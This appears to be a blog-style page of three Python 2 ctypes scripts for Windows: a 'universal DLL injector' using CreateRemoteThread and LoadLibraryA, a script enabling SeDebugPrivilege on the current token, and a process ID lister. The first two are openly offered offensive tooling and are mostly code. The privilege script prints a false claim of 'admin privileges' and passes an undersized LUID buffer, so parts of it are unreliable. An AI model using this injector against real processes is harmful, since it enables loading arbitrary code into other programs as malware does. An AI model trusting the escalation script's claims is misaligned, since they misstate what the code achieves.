
DLL Injection in python

The following code uses the kernel32.CreateRemoteThread function to start a thread in the selected process that loads the selected DLL (also known as DLL injection). The following steps are executed:
1) Get Process Handle (by PID)
2) Allocate space for dll path
3) Write dll path to the process selected in step 1
4) Resolve address of kernel32.dll & LoadLibraryA function
5) Use info from step 2,3,4 to call kernel32.CreateRemoteThread with specified DLL
6) DLL Injected ;D


# Banner and usage text; printed unconditionally before sys.argv is read.
print "[+] Universal DLL Injector by Y"
print "[+] contact : If you know me then give me a shout"
print "[+] usage: ./dll_injector.py <PID> <DLLPATH>"
print "\n"

from ctypes import *
import sys,ctypes

# Win32 constants used below (values as defined in the Windows SDK headers).
PAGE_RW_PRIV = 0x04          # PAGE_READWRITE: protection for the allocated page
PROCESS_ALL_ACCESS = 0x1F0FFF  # full access mask requested from OpenProcess
VIRTUAL_MEM = 0x3000         # MEM_COMMIT | MEM_RESERVE: allocation type for VirtualAllocEx

# ctypes handle to the local kernel32.dll; every Win32 call below goes through it.
kernel32 = windll.kernel32

def dll_inject(PID,DLL_PATH):
    """Load DLL_PATH into the process identified by PID via a remote thread.

    The call chain is the textbook remote-thread injection pattern:
    OpenProcess -> VirtualAllocEx -> WriteProcessMemory ->
    GetProcAddress(LoadLibraryA) -> CreateRemoteThread.  Endpoint
    monitoring commonly alerts on exactly this sequence issued by a
    non-system process, so expect the activity to be logged.

    PID      -- target process id (int).
    DLL_PATH -- path string copied into the target and passed to
                LoadLibraryA as its single argument.
    Calls sys.exit(0) on the failures it detects; otherwise returns None.
    """
    print "[+] Starting DLL Injector"
    LEN_DLL = len(DLL_PATH)# byte count written into the target
    print "\t[+] Getting process handle for PID:%d " % PID 
    hProcess = kernel32.OpenProcess(PROCESS_ALL_ACCESS,False,PID)
    
    # NOTE(review): OpenProcess returns NULL (0) on failure, and ctypes
    # hands that back as an int, so the comparison with None never matches
    # and this branch is effectively dead.
    if hProcess == None:
        print "\t[+] Unable to get process handle"
        sys.exit(0)
    print "\t[+] Allocating space for DLL PATH"
    # Reserve+commit LEN_DLL bytes of read/write memory in the target.
    # The returned address is used without checking for NULL.
    DLL_PATH_ADDR = kernel32.VirtualAllocEx(hProcess, 
                                            0,
                                            LEN_DLL,
                                            VIRTUAL_MEM,
                                            PAGE_RW_PRIV)
    bool_Written = c_int(0)
    print "\t[+] Writing DLL PATH to current process space"
    # Copy the path into the remote allocation; bool_Written receives the
    # number of bytes written but is never inspected.
    kernel32.WriteProcessMemory(hProcess,
                                DLL_PATH_ADDR,
                                DLL_PATH,
                                LEN_DLL,
                                byref(bool_Written))
    print "\t[+] Resolving Call Specific functions & libraries"
    # Both lookups resolve addresses in *this* process; the script assumes
    # kernel32 is mapped at the same base in the target.
    kernel32DllHandler_addr = kernel32.GetModuleHandleA("kernel32")
    print "\t\t[+] Resolved kernel32 library at 0x%08x" % kernel32DllHandler_addr
    LoadLibraryA_func_addr = kernel32.GetProcAddress(kernel32DllHandler_addr,"LoadLibraryA")
    print "\t\t[+] Resolve LoadLibraryA function at 0x%08x" %LoadLibraryA_func_addr
    
    thread_id = c_ulong(0) # receives the id of the thread created in the target
    print "\t[+] Creating Remote Thread to load our DLL"
    # Start a thread in the target whose entry point is LoadLibraryA and
    # whose parameter is the remote copy of DLL_PATH.
    if not kernel32.CreateRemoteThread(hProcess,
                                None,
                                0,
                                LoadLibraryA_func_addr,
                                DLL_PATH_ADDR,
                                0,
                                byref(thread_id)):
        print "Injection Failed, exiting"
        sys.exit(0)
    else:
        print "Remote Thread 0x%08x created, DLL code injected" % thread_id.value
# Script entry: no argv length check, so missing arguments raise IndexError
# after the banner has been printed.
PID = int(sys.argv[1])
DLL_PATH = str(sys.argv[2])
dll_inject(PID, DLL_PATH)

Universal Process Privilege Escalation

By adjusting the process token, it's possible to elevate your current process privileges to enable certain functionality that is not available otherwise.

Basically, the steps we follow are:
1) Get current process handle
2) Get current process token
3) Resolve SeDebugPrivilege value
4) Create a new token with the resolved value from step 3
5) Adjust the token of the current process with new privilege
6) Close process handle

Following code demonstrates the principle.


# Banner; printed unconditionally at import/run time.
print "[+] Universal Process Escalation by Y"
print "[+] contact : If you know me then give me a shout"

from ctypes import windll
import ctypes
from ctypes import *

class TOKEN_PRIVS(ctypes.Structure):
    """Hand-rolled TOKEN_PRIVILEGES holding exactly one privilege entry.

    Privileges flattens a single LUID_AND_ATTRIBUTES into three ULONGs:
    (LUID.LowPart, LUID.HighPart, Attributes).  The layout only matches
    the SDK structure where ULONG is 32 bits and no padding is inserted.
    """
    _fields_ = (
        ("PrivilegeCount",    ULONG),      # number of entries in Privileges (always 1 here)
        ("Privileges",        ULONG * 3 )  # LowPart, HighPart, Attributes
    )

def get_debug_privs():
    """Enable SeDebugPrivilege on the current process token.

    AdjustTokenPrivileges can only switch on privileges the token already
    holds; it does not grant new ones.  A token that lacks SeDebugPrivilege
    (a standard, non-administrative user) is left unchanged.  No return
    value from any of the advapi32 calls is checked, so the closing
    "admin privileges" message is printed regardless of the outcome.
    Returns None.
    """
    # Adjust Current TOKEN
    token = HANDLE()
    print "\t[+] Getting Current Token"
    flags =  40 # TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY (0x28); computed but never used
    # Opens the token with 0x20 = TOKEN_ADJUST_PRIVILEGES only, not `flags`.
    windll.advapi32.OpenProcessToken(windll.kernel32.GetCurrentProcess(), 0x00000020, ctypes.byref(token))
    print "\t[+] Calculating Local SeDebugPrivilege"
    admin_priv_name = "SeDebugPrivilege" # privilege to enable on the token
    # NOTE(review): despite its name this receives the privilege LUID, not a
    # byte count.  LookupPrivilegeValueA expects a pointer to an 8-byte LUID;
    # a 4-byte c_ulong is passed, so only LowPart lands inside the object
    # and the HighPart write falls outside it -- confirm on the target build.
    pBytesReturned = ctypes.c_ulong() 
    windll.advapi32.LookupPrivilegeValueA(None,admin_priv_name,ctypes.byref(pBytesReturned))
    print "\t[+] Resolved SeDebugPrivilege as %d" % pBytesReturned.value
    print "\t[+] Modifying TOKEN Structure to enable Debug"
    privs = TOKEN_PRIVS()
    privs.PrivilegeCount = 1
    # (LUID.LowPart, LUID.HighPart = 0, Attributes = 2 = SE_PRIVILEGE_ENABLED)
    privs.Privileges = (pBytesReturned.value,0, 2) 
    print "\t[+] Adjusting Privileges of the current process"
    # DisableAllPrivileges=0, no PreviousState buffer requested; result unchecked.
    windll.advapi32.AdjustTokenPrivileges(token, 0, ctypes.byref(privs),0,0,0)
    print "\t[+] Closing current handle, almost done"
    windll.kernel32.CloseHandle(token)
    print "[+] Done, your process " , windll.kernel32.GetCurrentProcessId(), "has now admin privileges"
    ############ CURRENT TOKEN ADJUSTED ##################
	
# Runs on import as well as when executed as a script.
get_debug_privs()

PID Enumeration on Windows with pure python ctypes

The following code enumerates process IDs on the current system by calling EnumProcesses from psapi on Windows. It should work for the majority of Windows versions that have psapi.dll in %systemroot%.


from ctypes import *

# ctypes handle to psapi.dll, which exports EnumProcesses.
psapi = windll.psapi

# Banner; printed unconditionally at import/run time.
print "[+] PID dumper by Y"
print "[+] contact : If you know me then give me a shout"

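def getListOfProcesses():
    """Print the PID of every process reported by psapi.EnumProcesses.

    A fixed buffer of 4096 DWORDs is handed to EnumProcesses.  The call's
    BOOL result is checked so a failure is reported instead of printing
    garbage, and a completely filled buffer is flagged because
    EnumProcesses gives no other indication that the list was truncated.
    Returns None; output goes to stdout.
    """
    max_array = c_ulong * 4096   # DWORD array large enough for most systems
    pProcessIds = max_array()    # receives the PIDs
    pBytesReturned = c_ulong()   # receives the number of bytes actually filled
    ok = psapi.EnumProcesses(byref(pProcessIds),
                             sizeof(pProcessIds),
                             byref(pBytesReturned))
    if not ok:
        # GetLastError comes from ctypes (star-imported above).
        print "[-] EnumProcesses failed, error %d" % GetLastError()
        return

    # A full buffer means there may be more processes than fit in 4096 entries.
    if pBytesReturned.value == sizeof(pProcessIds):
        print "[-] Warning: PID buffer is full, the list may be truncated"

    # bytes filled / bytes per DWORD = number of PIDs returned
    nReturned = pBytesReturned.value // sizeof(c_ulong)
    # Slicing a ctypes array yields a plain list of ints.
    for pid in pProcessIds[:nReturned]:
        print "[+] Running Process PID %d" % pid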

# Runs on import as well as when executed as a script.
getListOfProcesses()